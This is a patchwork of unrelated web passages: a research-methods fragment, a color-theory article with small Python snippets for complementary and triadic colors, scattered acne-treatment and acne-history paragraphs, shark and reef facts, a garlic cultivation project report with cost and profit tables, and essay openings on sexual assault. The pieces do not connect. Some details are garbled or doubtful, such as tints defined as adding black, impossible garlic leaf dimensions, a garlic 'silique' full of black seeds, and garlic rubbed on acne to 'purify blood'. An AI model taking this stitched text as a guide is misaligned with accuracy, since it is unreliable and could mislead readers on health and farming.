It allows participants to clarify what their intentions were, correct errors, and provide additional information if necessary (Statistics Solutions, 2017).

Advantages and Limitations of the Sequential Research Design

The strengths and weaknesses of the sequential research design have been widely discussed in the literature (Wegscheider, K., 2003). Advantages of the design are: (1) fully sequential designs can be used to prove the efficacy of a striking new therapy when a precise estimate of the amount of benefit is not required, (2) researchers are able to eliminate cultural or demographic factors from their findings, and (3) controlling for cultural differences and time allows sequential studies to measure changes more accurately than other types of studies. The limitations of the design are: (1) the steady decrease in participation over time, referred to as "participant mortality," and (2) the fact that most sequential studies merely observe the subjects without manipulating environmental factors.

Research Permission and Ethical Considerations

The researchers will provide waivers that explain the purpose of the research and inform the participants of possible harms that are not apparent and do not directly affect them. The names of the participants will be kept confidential, and participants will be allowed to withdraw from the study if they wish to withhold their test scores. The researchers determined that the study poses no adverse health risks to the participants; the teacher who keeps a record of the test scores will distribute consent forms to the students and will be asked for permission to allow the researchers to gather the data needed.

Role of the Researchers

The researchers' roles in the study are divided into three parts: the debriefing phase, the quantitative phase, and the qualitative phase.
In the first, debriefing phase, the researchers' role is to ensure that the participants undergo debriefing that informs them of the nature and purpose of the research, including the results of the study. Ethics is defined as a "set of principles which relate to a moral code specifying right from wrong" (Mukherji and Albon, 2010), and the researchers guarantee that this protocol will be followed. Participants must know what the study is about and must not be misled about any aspect of it. Procedures such as protecting the subjects from harm are also among the researchers' responsibilities. Any information or data gathered that could risk the privacy of the respondents will be erased after the study to respect their anonymity.

In the second, quantitative phase, the researchers are tasked with collecting data by acquiring the pre- and post-tests of the participants from the two groups, control and experimental, in order to answer questions on the significance of integrating audio-visual technology for the learning outcomes of students at the Technological Institute of the Philippines. The data analysis will be done using proper statistical techniques, and the results will be interpreted based on the established values of the instruments or formulas used.

In the third, qualitative phase, the researchers will administer the paper interview to respondents chosen according to criteria derived from the research objective. The researchers will then collect the data by transcribing the answers of each respondent. The analysis will be performed by understanding the transcripts while reducing bias as much as possible. The interpreted data will be the researchers' grounds for constructing conclusions within the framework of the findings.
Choosing the best combination of colors for an interactive design layout is not, as it may
appear, a guessing game. Knowing which ones to use will save you time (and headaches). Getting it right will also keep your users connected.
Since the early days of art and design, the use of color has followed many rules and
guidelines, which are collectively known as color theory.
A color scheme is one of the first elements to communicate the message behind the design on
both visual and psychological levels. In fact, the color scheme is one of the most important elements; this is because, when used correctly, color can reflect the niche and even the overall business marketing strategy.
In this article, we will briefly review different color classifications to refresh your memory about those graphic design classes you took at university. We're sure that the content will both ring a bell and inspire your creativity.
The color wheel shows links between different colors based on the red, yellow, and blue content of each color. It was first developed by Sir Isaac Newton in 1666.
The color wheel's most useful and most commonly used variant is shown in the image above, which includes red, red-orange, orange, orange-yellow, yellow, yellow-green, green, green-blue, blue, blue-purple, purple, and purple-red combinations (Stone, 2008).
Bleicher (2011) stated that the color wheel can be categorized into three main types of colors
based on the combination of base colors used to create the final color, as follows:
Primary colors - yellow, red, and blue. These are basic colors that cannot be broken
down into any simpler colors.
Secondary colors - these are created by mixing two primary colors. The secondary
colors are orange, green, and purple. Mixing yellow and red creates orange; mixing blue and yellow creates green, and mixing blue and red creates purple.
Intermediate or tertiary colors are created by mixing both primary and secondary
colors to form a hybrid, such as yellow-orange, red-orange, red-purple, blue-purple, blue-green, and yellow-green. On a larger color wheel than the one shown above, a mix between intermediate, secondary, and primary colors would create quaternary colors.
A thorough understanding of the color wheel and the relationship between colors enables designers to understand color better and know how to choose colors for their designs. We'll come to this shortly.
According to Bleicher (2011), there are five main color schemes (and some combinations and
variants of these schemes) that allow designers to achieve harmony in their designs:
Monochromatic Scheme
The monochromatic scheme is based on the colors created from different tints (created by adding black or white to the original color), tones, and shades of one hue. In theory, it's the simplest of all the schemes. A monochromatic scheme is commonly used in minimal designs because one hue should result in a less distracting layout.
On the other hand, this scheme means that you cannot use multiple colors to help with
visualizing information in the User Interface (UI). That is the only price of simplicity.
Analogous Scheme

The analogous scheme is based on three colors located next to each other on the color wheel (e.g., red, red-orange, and red-violet). This scheme can easily be found in nature: just think of trees in autumn as the leaves change color.
There is a variant on this scheme, the high-key analogous color scheme. It's achieved by mixing your analogous shades with white. This version is commonly found in impressionist art, particularly early impressionist art. The effect achieved is one where the colors seem to shimmer and blur into each other; when viewed from a distance, it can create the illusion that only a single color is in use.
Complementary Schemes
Complementary color schemes use one (or more) pairs of colors that, when combined, cancel
each other out. For example, when you combine the two colors, they produce white or black (or something very similar from the gray-scale). For that reason, this scheme is also known as the opposite color scheme.
When you put two complementary colors next to each other, they show the greatest contrast.
In modern color theory, the pairs are red/cyan, green/magenta, and blue/yellow.
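In additive RGB terms, these complementary pairs can be computed directly: a color and its complement sum to white, so each channel is mirrored around 255. The `complement` helper below is our own illustration, not a library function.

```python
def complement(rgb):
    """Return the RGB complement of a color.

    In modern (additive RGB) color theory, a color and its complement
    sum to white, so each channel is mirrored around 255.
    """
    r, g, b = rgb
    return (255 - r, 255 - g, 255 - b)

print(complement((255, 0, 0)))  # red   -> (0, 255, 255), cyan
print(complement((0, 255, 0)))  # green -> (255, 0, 255), magenta
print(complement((0, 0, 255)))  # blue  -> (255, 255, 0), yellow
```

The three printed pairs are exactly the red/cyan, green/magenta, and blue/yellow pairs mentioned above.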
This is a combination of the complementary color scheme and the analogous color scheme. In essence, complementary colors are chosen and then the colors on either side of them on the color wheel are also used in the design. It's considered to soften the impact of a complementary color scheme, which can, in some situations, be too bold or too harsh on the viewer's eye.
Triadic
The triadic scheme is based on using three colors at equal distances from each other on the color wheel. The easiest way to find a triadic scheme is to put an equilateral triangle on the wheel so that each corner touches one color. The three colors will be exactly 120° from each other.
These schemes are considered to be vibrant (even when the hues themselves are not); they keep the harmony but deliver a high level of visual contrast. You can find triadic schemes in a lot of art, as it's easier to deliver a pleasing visual result with a triadic scheme than with a complementary scheme.
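A triadic scheme amounts to rotating a base color's hue by 120° steps around the wheel. Here is a minimal sketch using Python's standard `colorsys` module; the `rotate_hue` helper is our own illustration, not part of any design library.

```python
import colorsys

def rotate_hue(rgb, degrees):
    """Rotate a color's hue around the color wheel by the given angle."""
    r, g, b = (c / 255.0 for c in rgb)
    h, l, s = colorsys.rgb_to_hls(r, g, b)
    h = (h + degrees / 360.0) % 1.0
    r2, g2, b2 = colorsys.hls_to_rgb(h, l, s)
    return tuple(round(c * 255) for c in (r2, g2, b2))

base = (255, 0, 0)  # pure red
triad = [base, rotate_hue(base, 120), rotate_hue(base, 240)]
print(triad)  # [(255, 0, 0), (0, 255, 0), (0, 0, 255)]: 120 degrees apart
```

The same helper covers the other geometric schemes: rotating in 90° steps yields a square scheme, and rotating by 180° returns the complement.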
Tetradic
Tetradic schemes utilize two sets of complementary pairs: four colors. These can create very interesting visual experiences, but they are hard to keep in balance. Why? It's because one color of a tetradic scheme needs to dominate the other colors without completely overwhelming them. An equal amount of each color often leads to a very awkward look: the last thing you want your users to see.
The square scheme is a variant of the tetradic scheme. Instead of choosing two complementary pairs, you place a square on the color wheel and choose the colors that lie on its corners. Therefore, you'll find four colors that are evenly spaced at 90° from each other. Unlike the tetradic color scheme, this approach often works best when all the colors are evenly used throughout the design.
Color Temperature
Colors can be used to convey emotive content as well as assist with the look and feel of your website. We're talking about moving people now, evoking passions and feelings in our users. It's worth noting at this point that people's culture, gender, experiences, etc. will also affect the way that colors resonate with them, and that user research is a better indicator of emotional response to color than the following guidelines based on the color wheel. For instance, did you know that, in China, red is common because it represents happiness and prosperity, but white is considered funerary or representing misfortune? Also, Chinese culture has a unique color, qing, which is a sort of bluish-green gray, or grue. In Greece, yellow conveys notions of sadness, while red conveys such notions in South Africa. Color is a big issue in how people from different parts of the world will interpret your design. A little research goes a long way.
However, if you want to follow the color wheel approach, there are three categories of color temperature: warm, cool, and neutral.

Warm colors: These are colors located on the half of the color wheel that includes yellow, orange, and red. These colors are said to reflect feelings such as passion, power, happiness, and energy.

Cool colors: These are colors located on the other side of the color wheel, including green, blue, and purple. Cool colors are said to reflect calmness, meditation, and soothing impressions.

Neutral colors: These are not said to reflect any particular emotions. They include gray, brown, white, and black.
Your choice of color categories will depend on what you are trying to achieve with your website. You should always, wherever possible, test your color palettes with your users to be sure that the choices you have made reflect their realities. It's almost always easier to set and test a color palette early in the development process than at the end. Apart from anything else, it can save you valuable time.
The Color Wheel is a fundamental tool, created by Sir Isaac Newton in 1666. In it, we find:
Primary colors
Secondary colors
We should aim to fine-tune our choice of colors to create maximum harmony, considering the
following at the same time in order to pick the most appropriate scheme:
Monochromatic scheme
Analogous scheme
Complementary schemes
Triadic
Tetradic
Square
Color Temperature is another vital consideration; it's the part that can strike chords in people and make them passionate about our work. You should always do user testing of color schemes, if possible, and ideally at the start of the design process. Also, always keep in mind that colors have many cultural connotations, so make sure that you're aware of them!
On the other hand, remember that you should not convey meaning only with color. About 8% of people, mostly men, are color blind, and color is not always accessible. Even so, color is a tool that can enhance the other elements of your design. Consider it a large ingredient that can bring your work to life and engage your users, making them care more about your product, service or message.
The side effects depend on the type of treatment you use. Generally, for topical, over-the-counter creams, you can watch out for stinging, redness, irritation and peeling — these side effects usually don’t go any deeper than the skin. Others, like oral antibiotics or hormonal medications, could come with new sets of complications, so we suggest talking to your doctor before pursuing the treatment.
Garlic is fantastic for fighting acne due to its high levels of antioxidants, as well as its anti-bacterial, anti-fungal, and anti-viral properties. There are two ways you can use garlic to clear up acne. The first is a preventative measure, which is simply adding more garlic to your diet. This helps your general health as well as purifying your blood, which can help to stop future breakouts. For more immediate results, take a peeled clove of garlic and rub it on the troubled area several times a day. If your skin is sensitive, try crushing the garlic and mixing it with some water.
The approach to acne treatment underwent significant changes during the twentieth century. Retinoids were introduced as a medical treatment for acne in 1943.[83] Benzoyl peroxide was first proposed as a treatment in 1958 and has been routinely used for this purpose since the 1960s.[168] Acne treatment was modified in the 1950s with the introduction of oral tetracycline antibiotics (such as minocycline). These reinforced the idea amongst dermatologists that bacterial growth on the skin plays an important role in causing acne.[164] Subsequently, in the 1970s tretinoin (original trade name Retin A) was found to be an effective treatment.[169] The development of oral isotretinoin (sold as Accutane and Roaccutane) followed in 1980.[170] After its introduction in the United States it was recognized as a medication highly likely to cause birth defects if taken during pregnancy. In the United States, more than 2,000 women became pregnant while taking isotretinoin between 1982 and 2003, with most pregnancies ending in abortion or miscarriage. About 160 babies were born with birth defects.[171][172]
Fractional laser treatment is less invasive than ablative laser treatment, as it targets only a fraction of the skin at a time. Fractional lasers penetrate the top skin layers, where their light energy stimulates collagen production and resurfaces the top layer of the epidermis. Treatments typically last between 15 and 45 minutes and effects become visible in 1 to 3 weeks.

When blocked pores become increasingly irritated or infected, they grow in size and go deeper into the skin. If pimples get trapped beneath the skin's surface, they can form papules: red, sore spots which can't be popped (please don't try! Squeezing the oil, bacteria, and skin cell mixture can result in long-term scars that may be unresponsive to acne treatments). They're formed when the trapped, infected pore becomes increasingly inflamed and irritated, and they usually feel hard to the touch. Papules are small (less than 1 centimeter in diameter) with distinct borders; when clusters of papules occur near each other, they can appear as a rash and make your skin feel rough like sandpaper. Because they're inaccessible, they're a bit more difficult to treat, and are therefore considered moderately severe acne.

Exercise not only helps you with fitness, but it can help reduce acne-prone skin irritations. That's right, add its use on how to get rid of pimples to the list of exercise benefits. Exercise offers stress relief while getting the blood circulating. This blood-pumping activity sends oxygen to your skin cells, which helps remove dead cells from the body.
Retinoids are medications which reduce inflammation, normalize the follicle cell life cycle, and reduce sebum production.[45][83] They are structurally related to vitamin A.[83] Studies show they are underprescribed by primary care doctors and dermatologists.[15] The retinoids appear to influence the cell life cycle in the follicle lining. This helps prevent the accumulation of skin cells within the hair follicle that can create a blockage. They are a first-line acne treatment,[1] especially for people with dark-colored skin, and are known to lead to faster improvement of postinflammatory hyperpigmentation.[36]

Whereas blackheads are open, whiteheads are closed comedones. They appear as small, white, round bumps on the skin's surface. Whiteheads form when a clogged pore is trapped by a thin layer of skin, leading to a buildup of pus. They range in size from virtually invisible to large, noticeable blemishes, and can appear on the face or all over the body. Whiteheads are generally painless and non-inflammatory, so they don't exhibit redness or swelling. Although they are unsightly, this type of pimple is generally considered a mild form of acne.

There are a number of mild chemical peels available over the counter, but acne scar removal requires a stronger peel typically administered by a doctor or dermatologist. Trichloroacetic acid (TCA) peels are slightly stronger than alpha hydroxy acid (AHA) peels and may be used for acne scar treatment. The strongest type, phenol peels, may cause significant swelling and require up to two weeks of recovery time at home. Neither is recommended for people with active severe acne.

This content is strictly the opinion of the author, and is for informational and educational purposes only. It is not intended to provide medical advice or to take the place of medical advice or treatment from a personal physician. All readers of this content are advised to consult their doctors or qualified health professionals regarding specific health questions.
Baby acne is usually mild, and it’s limited to the face 99 percent of the time, says Teri Kahn, MD, clinical associate professor of dermatology and pediatrics at University of Maryland School of Medicine and Mt. Washington Pediatric Hospital in Baltimore. “Typically, baby acne appears in the form of little whiteheads and blackheads on the forehead, cheeks, and chin,” she says. Other skin conditions, like eczema, show up on other parts of the body.
A study conducted by the Department of Dermatology at the University of Freiburg in Germany reports that using frankincense and five other plant extracts for antimicrobial effects on bacteria and yeast relating to the skin proved effective. The study concluded that their antimicrobial effects were powerful enough to be used as a topical treatment of some skin disorders, including acne and eczema. (19)
The recognition and characterization of acne progressed in 1776 when Josef Plenck (an Austrian physician) published a book that proposed the novel concept of classifying skin diseases by their elementary (initial) lesions.[164] In 1808 the English dermatologist Robert Willan refined Plenck's work by providing the first detailed descriptions of several skin disorders using a morphologic terminology that remains in use today.[164] Thomas Bateman continued and expanded on Robert Willan's work as his student and provided the first descriptions and illustrations of acne accepted as accurate by modern dermatologists.[164] Erasmus Wilson, in 1842, was the first to make the distinction between acne vulgaris and rosacea.[165] The first professional medical monograph dedicated entirely to acne was written by Lucius Duncan Bulkley and published in New York in 1885.[166][167]

Diet. Studies indicate that certain dietary factors, including skim milk and carbohydrate-rich foods, such as bread, bagels and chips, may worsen acne. Chocolate has long been suspected of making acne worse. A small study of 14 men with acne showed that eating chocolate was related to a worsening of symptoms. Further study is needed to examine why this happens and whether people with acne would benefit from following specific dietary restrictions.
The proliferation of mobile health (mHealth), namely, mobile applications along with wearable and digital health devices, enables generating the growing amount of heterogeneous data. To increase the value of devices and apps through facilitating new data uses, mHealth companies often provide a web application programming interface (API) to their cloud data repositories, which enables third-party developers to access end users’ data upon receiving their consent. Managing such data sharing requires making design and governance decisions, which must allow maintaining the tradeoff between promoting generativity to facilitate complementors’ contributions and retaining control to prevent the undesirable platform use. However, despite the increasing pervasiveness of web data sharing platforms, their design and governance have not been sufficiently analyzed. By relying on boundary resource theory and analyzing the documentation of 21 web data sharing platforms, the paper identifies and elaborates 18 design and governance decisions that mHealth companies must make to manage data sharing, and discusses their role in maintaining the tradeoff between platform generativity and control.
The Caribbean reef shark (Carcharhinus perezi) is a species of requiem shark, belonging to the family Carcharhinidae. It is found in the tropical waters of the western Atlantic Ocean from Florida to Brazil, and is the most commonly encountered reef shark in the Caribbean Sea. With a robust, streamlined body typical of the requiem sharks, this species is difficult to tell apart from other large members of its family such as the dusky shark (C. obscurus) and the silky shark (C. falciformis). Distinguishing characteristics include dusky-colored fins without prominent markings, a short free rear tip on the second dorsal fin, and tooth shape and number.

Cyanobacteria do not have skeletons and individuals are microscopic. Cyanobacteria can encourage the precipitation or accumulation of calcium carbonate to produce sediment bodies that are distinct in composition and have relief on the seafloor. Cyanobacterial mounds were most abundant before the evolution of shelly macroscopic organisms, but they still exist today (stromatolites are microbial mounds with a laminated internal structure). Bryozoans and crinoids, common contributors to marine sediments during the Mississippian (for example), produced a very different kind of mound. Bryozoans are small and the skeletons of crinoids disintegrate. However, bryozoan and crinoid meadows can persist over time and produce compositionally distinct bodies of sediment with depositional relief.
During mating, the male grey reef shark will bite at the female's body or fins to hold onto her for copulation.[13] Like other requiem sharks, it is viviparous: once the developing embryos exhaust their supply of yolk, the yolk sac develops into a placental connection that sustains them to term. Each female has a single functional ovary (on the right side) and two functional uteruses. One to four pups (six in Hawaii) are born every other year; the number of young increases with female size. Estimates of the gestation period range from 9 to 14 months. Parturition is thought to take place from July to August in the Southern Hemisphere and from March to July in the Northern Hemisphere. However, females with "full-term embryos" have also been reported in the fall off Enewetak. The newborns measure 45–60 cm (18–24 in) long. Sexual maturation occurs at around seven years of age, when the males are 1.3–1.5 m (4.3–4.9 ft) long and females are 1.2–1.4 m (3.9–4.6 ft) long. Females on the Great Barrier Reef mature at 11 years of age, later than at other locations, and at a slightly larger size. The lifespan is at least 25 years.[4][20][24]
Introduction to Garlic Cultivation Project Report

Today, let us get into the details of the Garlic Cultivation Project Report.
Garlic is a bulbous plant species belonging to the onion genus. It is closely related to the onion, leek, shallot, chive, and Chinese onion. The garlic plant is native to central Asia and northeastern Iran. Garlic is generally used as a seasoning agent in most food preparations and is believed to have been used by the ancient Egyptians as a source of traditional medicine. Garlic, botanically Allium sativum, grows in the wild in some regions, and the species that grow in Britain are classified into wild, crow, and field garlic. Different species of garlic are named differently in various places, such as Allium vineale (wild or crow garlic), Allium canadense (meadow or wild garlic), and Allium ampeloprasum (elephant garlic). The single-clove variety, called solo or pearl garlic, is found mostly in Yunnan province of China.
The total world production of garlic is more than 26.6 million tonnes, of which China alone contributes about 80%. India is the second largest producer of garlic and accounts for almost 5% of total world production. Garlic in India is cultivated mostly in Tamil Nadu, Andhra Pradesh, Uttar Pradesh, and Gujarat. The general composition of raw garlic is 59% water, 33% carbohydrates, 6% protein, 2% dietary fiber, and almost 1% fat.
This garlic cultivation project report describes the agro-climatic requirements for cultivating garlic and also focuses on the investment and profit associated with cultivating garlic on a small area of land.

Garlic plant description

The roots of the plant are shallow and form below the bulb. The stem grows to a height of approximately 5 to 6.5 cm. The leaves of the garlic plant are flat, long, and grass-like, and smell like garlic when crushed. The colour of the leaves is blue-green and they grow in a dense clump. The leaves on the plant are alternate and are wider at the base of the stem. The shape of the leaves is triangular, with a length of 2.5 cm and a width of approximately 5 to 7.5 cm. The rosettes during the first year extend up to 10 cm high. The flowers appear at the end of the stalk that arises directly from the bulb. The flowers are white and are grouped so that they form a globular head. Each garlic flower has four petals about 0.5 cm in length. These flowers bloom in the spring season. The fruit is 2.5 to 6.3 cm long and looks like a green capsule called a silique. This fruit contains many seeds and generally bursts open when mature, dispersing seeds several meters from the plant. Inside the silique, small black seeds grow in rows. Garlic seeds remain viable for 5 years. It is estimated that plants can produce about 800 seeds depending on the environmental conditions, cultivar, and planting density in the region. These seeds are useful for breeding new plants.

Varieties of Garlic
All the different varieties of garlic fall into two major categories: soft neck garlic and hard neck garlic. The common garlic found in supermarkets is soft neck garlic, whereas the more flavourful garlic is hard neck garlic. The varieties are mainly differentiated on the basis of colour, taste, length of storage, size, number of cloves, hardness, and suitability. The varieties are:
Artichoke – Vigorous, productive and adaptable. It is easy to grow and can be stored for a long time.
Silverskin – Needs a mild winter climate to grow. The cloves are tall and pinkish in colour, with a long storage life of about 8 to 10 months. Good for braiding.
Porcelain – Impressive to look at because of its large clove size and rich flavour. The bulb is smooth and symmetrical with snow-white wrappers, and contains 4 to 8 off-white cloves with rose-red or purple stripes.
Purple stripe – The most suitable variety for cooking; the name indicates the colour of the bulb. Generally, a single bulb contains 8 to 12 cloves, which are tall and elongated.
Rocambole – Each bulb contains 6 to 11 cloves, which are brownish or reddish in colour. This variety can be stored for 3 to 4 months.
Other than these some developed cultivars of India are Bhima Omkar, Bhima purple, Agrifound white, Yamuna safed, Yamuna safed (2, 3, 5), Godavari, Shewta, Phule Baswant, GG-4, VL garlic 1, VL lahsun 2 and agrifound parvati (2).
Soil and climatic requirements for growing Garlic
Garlic can best be cultivated in warm climatic conditions. The most suitable growth temperature for the cultivation of garlic is 13 to 24˚C. The length of the day and the temperature of the region influence the plants. Bulb formation needs approximately 13 to 14 hours of day length for long day garlic variety and about 10 to 12 hours for short day garlic varieties. Garlic can be cultivated at elevations of 1000 to 1300 meters above sea level.
Garlic needs well-drained soil rich in organic content; therefore compost or rotted manure is incorporated into the soil to make it friable and suitable for production. The pH level of the soil should be between 6 and 8 for garlic farming. The soil should be loosened before planting to help the growth of the bulb. Generally, loamy soil, with its natural draining properties, is considered good for garlic cultivation.
Propagation of Garlic Crop
Cloves are used for the propagation of garlic. Generally, 315 to 500 kg of cloves are needed for one hectare of land.
Land preparation and planting of Garlic
The land for garlic cultivation should be prepared well in advance to eliminate perennial weeds, adjust the pH and improve the organic content if needed. Generally, ploughing is done to a depth of 15 to 20 cm. The land should be harrowed and maintained in good tilth. All obstructions on the surface of the soil should be cleared, and if irrigation is needed in the region, the land should be levelled for arranging irrigation facilities.
Each method of planting has different spacing between rows. The general spacing recommendation for planting cloves is 8 to 15 cm, with a row spacing of about 30 to 40 cm. Furrows with a minimum depth of 50 mm and a spacing of 200 to 300 mm are created. The cloves are sown manually or mechanically along the rows, with the root end of the clove set into the soil in an erect manner. Garlic plants are normally cultivated on double-plant-row raised beds.
Generally, garlic is planted both during the Rabi (October-November) and Kharif season (June-July). Rabi crops of garlic are grown on flatbeds of about 4-6 m long and 1.5-2 m wide. Kharif crops are grown with a furrow system as mentioned above.
Manure and fertilizer requirement of Garlic Farming
Garlic plants need lots of fertilizer. The most important step in garlic cultivation is to incorporate compost into the soil to improve its fertility and maintain its structure. While planting the cloves, about 125 g of 3:2:3 NPK fertilizer is applied per m² using the broadcasting method. A light side dressing of 40 g of 3:2:3 NPK per m² is applied during the growing period, approximately 6 to 8 weeks after planting. If the field has not been treated with compost, then supplementary nitrogen fertilizer is added to the soil. Fertilizers can be applied through irrigation as well, but care must be taken to avoid foliar burn. Supplying fertilizers through fertigation is useful because the roots receive the fertilizers directly and less nitrogen leaches into the groundwater.
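The per-square-metre doses above scale to field level with straightforward arithmetic. A minimal sketch (the helper name and the 10,000 m² one-hectare figure are illustrative; it also assumes the whole area is broadcast-treated, whereas banding along rows would lower the real totals):

```python
# Scale the per-square-metre NPK 3:2:3 doses quoted above to a field.
# Assumes the full area is broadcast-treated.

def npk_totals(area_m2: float, base_g_per_m2: float = 125.0,
               side_dress_g_per_m2: float = 40.0) -> dict:
    """Return total 3:2:3 NPK fertilizer needed, in kilograms."""
    base_kg = area_m2 * base_g_per_m2 / 1000.0
    side_kg = area_m2 * side_dress_g_per_m2 / 1000.0
    return {"at_planting_kg": base_kg,
            "side_dressing_kg": side_kg,
            "total_kg": base_kg + side_kg}

totals = npk_totals(10_000)  # one hectare = 10,000 m²
print(totals["at_planting_kg"], totals["side_dressing_kg"], totals["total_kg"])
# 1250.0 400.0 1650.0
```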
Irrigation needs for growing Garlic
Moisture in the soil is more important than the quantity of water. Too much water in the plant area can cause water stress and result in the splitting of the bulbs, while too little water can stall the growth of the bulb. The recommended irrigation frequency is once immediately after planting and again at an interval of one week to 10 days after the first irrigation. The moisture content in the soil should always be checked before irrigating the plants. Farmers give the last irrigation just 2 or 3 days before harvesting. The commonly used irrigation methods are furrow, sprinkler, and drip irrigation. The most suitable time for irrigating the plants is morning to mid-afternoon, so that there is sufficient time for the foliage to dry before nightfall. In regions with extremely hot and dry weather, the fields are mulched to conserve soil moisture.
Intercultural practices of Garlic
Since garlic is a shallow-rooted crop, it may not utilize all the nutrients that have been supplied. Over time these fertilizers and nutrients leach down and settle at the subsoil level, so deep-rooted leguminous crops are planted after garlic cultivation to obtain improved yields and also to help maintain the fertility of the soil. Groundnuts can also be cropped after garlic cultivation. One month after sowing, the first weeding is done by hand or with a khurpi; about a month later, the second weeding is done. The land is hoed just before bulb formation to loosen the soil and facilitate better bulb formation. Once the bulbs start developing, weeding or hoeing should not be done, because this may damage the stem and impair the quality of the cloves. Mulching is done on the farmland to suppress weeds and conserve soil moisture, but grain straw is avoided as a mulch material because it hosts several pests. Mulching is expected to increase the yield of garlic significantly. Some varieties of garlic produce flower stalks; removing these stalks enhances crop maturity and yield, with an increase in yield of about 70% after removal.
Pest and disease control of Garlic
The most common pests found on garlic plants are cutworms, pink stalk borer, thrips, and eriophyid mites. Pests can be controlled by natural practices such as weed control and removal of damaged plant parts. Growing maize or wheat in the outer rows is considered a barrier against thrips. Chemicals (sulphur, carbosulfan, profenofos, and fipronil) at the recommended doses can also be used to control an extreme infestation.
Garlic plants are generally infected by diseases such as onion yellow dwarf, leek yellow stripe, iris yellow spot, purple blotch, stemphylium blight, white rot, brown rust, pink root, and neck rot. Control measures include the removal of diseased parts and crop rotation. Using disease-resistant cultivars as planting material can also reduce the occurrence of diseases, and soil solarisation before garlic cultivation can help control some soil-borne diseases. If the infection is more severe, then the recommended dose of fungicide can be used to control the spread of disease.
Harvest and yield of Garlic
Garlic is a 4 to 5-month duration crop. Maturity is indicated by the leaves turning yellowish or brownish; sometimes the leaves also dry up one month after stalk emergence. Once the plants have dried, they are uprooted completely using a country plough and tied in small bunches. These bundles are kept in the field or in the shade for 2 or 3 days for drying and curing, which helps the bulbs harden and prolongs their keeping quality.
The average yield of garlic from a land of one hectare is approximately estimated to be 50 to 70 quintals.
Post-harvest management of Garlic
Once the harvest is obtained, several further steps are taken to keep the produce safe for the market. These handling steps are:
Curing is done indoors with forced air to dry the bulbs; they can also be placed in slotted bins, wire racks or open trays in a well-ventilated area. The tops and roots of the garlic are trimmed after curing, either mechanically or by hand. The loose outer sheath is removed by brushing the bulbs, and this is the last step before marketing. The bulbs are graded according to their size, shape, and flavour, and packed in mesh bags or well-ventilated crates. Too many bulbs should not be packed in one crate, because they generate heat, which may reduce the quality of the bulbs. To maximize storage life, the bulbs should be properly cured and stored at 0˚C with a relative humidity of about 60 to 70%; under these conditions they can be stored for 6 to 7 months. If the humidity is higher, it encourages the development of Penicillium mould and root growth, and as the temperature rises above 0˚C, the rate of bulb weight loss also increases. Another way of storing the bulbs is in a controlled atmosphere with 0.5% O₂ and about 5 to 10% CO₂.
Cost and profit analysis of Garlic Cultivation / Economics of Garlic Farming / Garlic Cultivation Project Report
The investment model for cultivating garlic on one hectare of land is described here. Fixed charges such as land rental, electricity, and transport are not included, and these values may change depending on the region of the farm. The most important recurring costs are detailed below for reference. In non-rain-fed or very dry and hot regions, farms are fitted with drip or sprinkler systems, which incur an additional cost of around Rs 50,000 to Rs 75,000 per hectare depending on the size of the farm.
Material and labour | Investment in Rs
135 kg of seeds as planting material @ Rs 125/kg | 16,875.00
2.72 tonnes of FYM | 2,500.00
52.5 kg of N, 46 kg of P and 26.40 kg of K (fertilizers) | 5,000.00
Plant protection chemicals | 1,000.00
95.54 man-days of human labour | 19,108.00
7.50 bullock pair days | 2,625.00
3 hours of machine labour | 1,650.00
Total cost | 48,758.00
The yield from the farm is 50 to 70 quintals (5,000 to 7,000 kg) per hectare.
Cost of garlic: Rs 50 per kg (average price) when sold at the farm gate or in bulk by farmers.
So, on the lower side:
Income from the farm: total yield × price per unit = 5,000 × 50 = Rs 2,50,000. Profit from the farm: total income – total investment = Rs 2,01,242 (around 2 lakh rupees for 1 hectare, i.e. 2.5 acres, with a good yield).
Loans and subsidies for Garlic Cultivation
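The economics above can be checked with a few lines of code. This sketch uses only the report's own cost and price figures; the function and dictionary names, and the high-side yield example, are illustrative:

```python
# Rough one-hectare profit model using the report's own figures.
# Cost items come from the table above.

COSTS_RS = {
    "seed (135 kg @ Rs 125/kg)": 16_875,
    "FYM (2.72 tonnes)": 2_500,
    "fertilizers (N, P, K)": 5_000,
    "plant protection chemicals": 1_000,
    "human labour (95.54 man-days)": 19_108,
    "bullock pairs (7.50 days)": 2_625,
    "machine labour (3 hours)": 1_650,
}

def profit(yield_kg: float, price_rs_per_kg: float = 50.0) -> float:
    """Farm-gate income minus total recurring cost, in rupees."""
    return yield_kg * price_rs_per_kg - sum(COSTS_RS.values())

print(sum(COSTS_RS.values()))  # 48758
print(profit(5_000))           # 201242.0 (low-side yield, as in the text)
print(profit(7_000))           # 301242.0 (high-side yield)
```

On the high-side yield of 7,000 kg the same model gives a profit of about Rs 3 lakh, before the fixed charges excluded above.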
It is advisable to visit the National Horticulture Board for assistance and description of components for availing the subsidies for farming projects. NABARD also works to help farmers get loans and subsidies on various farming components depending on the size of the project.
Sexual Assault Sexual coercion, sexual assault, and rape are acts of violence with numerous physical and mental health consequences (Helgeson, 430). It is important for future generations to be informed about these topics so that we can prevent them from continuing. Sexual assaults are a rising problem for female teens on college campuses because of discrepancies with the "no means no" policy, recurring problems with college fraternities, and today's "rape" culture enabling sexual assault. It
by sexual assault and are left physically and mentally scarred. Sexual abuse can come in many different forms, such as sexual harassment, stranger assault and a more underreported crime such as date rape (Types of Sexual Assault). Date rape drugs are used in sexual assault, which is any type of sexual activity that a person does not agree to (Date Rape Drug: Get the Facts on the Different Kinds). Anyone can be a victim of sexual assault regardless of their race, culture, gender, sexual orientation
Anyone can be a victim of sexual assault. It does not matter what gender, age, economic class, religion, or race you are, because it can happen to anyone. According to one website, "Rape victims are doctors, lawyers, nurses, military personnel, cooks, accountants, students- anyone and everyone could be vulnerable to rape or sexual assault," ("Rape Myths and Facts," 2015). Therefore, yes, males can be the victims of sexual assault; in fact one out of every 10 rape victims is male (RAINN, 2016). Overall
Sexual abuse is a very sensitive and serious issue in the United States, as well as in other countries. Although we all live in a modern, civilized world, we hear more and more about these unpleasant affairs happening all the time, and it seems these problems are only increasing in every country. Therefore, each nation has its own legal definition of and law on sexual assault. The following information is an example of the legal definitions and statistics of those countries. United States – In the U.S
Rape and Sexual Assault Rape is a type of sexual assault usually involving sexual intercourse, which is initiated by one or more persons against another person without that person's consent. The act may be carried out by force, under threat, or with a person who is incapable of valid consent. The definition of rape varies both in different parts of the world and at different times in history. According to the American Medical Association, sexual violence, and rape in particular, is considered
